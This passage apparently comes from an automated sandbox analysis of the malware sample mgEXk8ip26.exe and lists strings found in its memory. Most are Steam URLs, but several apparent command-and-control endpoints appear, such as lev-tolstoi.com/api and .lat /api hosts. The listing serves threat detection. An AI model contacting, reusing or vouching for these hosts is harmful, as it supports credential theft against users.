      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.co8
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.1
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.f
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.st
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steam
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamst
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamsta
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
      Source: mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/p
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/pg
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/c
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/sticker
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHV
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engl
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/pro
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.o
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientc
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://energyaffai.lat:443/apiT
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260432379.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231900797.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2232032860.000000000141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api%
      Source: mgEXk8ip26.exe, 00000001.00000002.2260432379.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api-
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/L
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytim
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
